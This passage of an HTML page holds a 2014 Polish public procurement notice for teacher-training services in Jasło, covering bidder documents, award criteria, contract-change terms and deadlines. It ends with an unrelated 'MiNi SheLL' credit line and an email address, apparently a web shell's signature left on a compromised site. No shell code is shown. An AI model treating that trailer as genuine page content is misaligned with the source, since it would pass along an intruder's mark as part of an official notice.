- sieć współpracy i samokształcenia Praca z uczniem młodszym - jak skutecznie i efektywnie pracować w grupie sześciolatków i siedmiolatków
- doświadczenie w moderowaniu i prowadzeniu szkoleń dla nauczycieli, działań realizowanych w szkołach skierowanych do nauczycieli ( np. przygotowanie i przeprowadzenie lekcji otwartych, szkoleniowych rad pedagogicznych, nauczycielskich zespołów przedmiotowych, wykorzystaniem TIK).
Zamawiający dopuszcza, aby jedna osoba występowała w więcej niż jednej formie.
Ocena spełniania tego warunku odbędzie się na podstawie  - zał. nr 5 do siwz (wykaz osób), oświadczenia - załącznik nr 3, oraz zobowiązania innych podmiotów - zał. nr 6 do siwz (jeżeli dotyczy),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania tego warunku odbędzie się na podstawie oświadczenia - załącznik nr 3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Jeżeli Wykonawcy ubiegają się wspólnie o udzielenie zamówienia - pełnomocnictwo  do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2) Upoważnienie do podpisania oferty, o ile nie wynika ono z dokumentów dołączonych do oferty (oryginał lub kopia notarialnie potwierdzona za zgodność z oryginałem),
3) Zobowiązanie innych podmiotów - załącznik nr 6 przykładowy wzór (jeżeli dotyczy) - ORYGINAŁ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) Zmiana umowy może nastąpić w okoliczności zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
- której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, promieniowanie lub skażenia oraz będące następstwem tych zdarzeń przerwy w dostawie energii elektrycznej;
b) Zamawiający dopuszcza zmianę osoby prowadzącej formę doskonalenia na osobę o kwalifikacjach nie gorszych niż określone w zał. nr 5 do SIWZ po uprzednim pisemnym zawiadomieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://poen.superhost.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Ośrodek Edukacji Nauczycieli w Jaśle, ul. Sokoła 6, 38-200 Jasło.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 16:00, miejsce: Powiatowy Ośrodek Edukacji Nauczycieli w Jaśle, ul. Sokoła 6, 38-200 Jasło.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com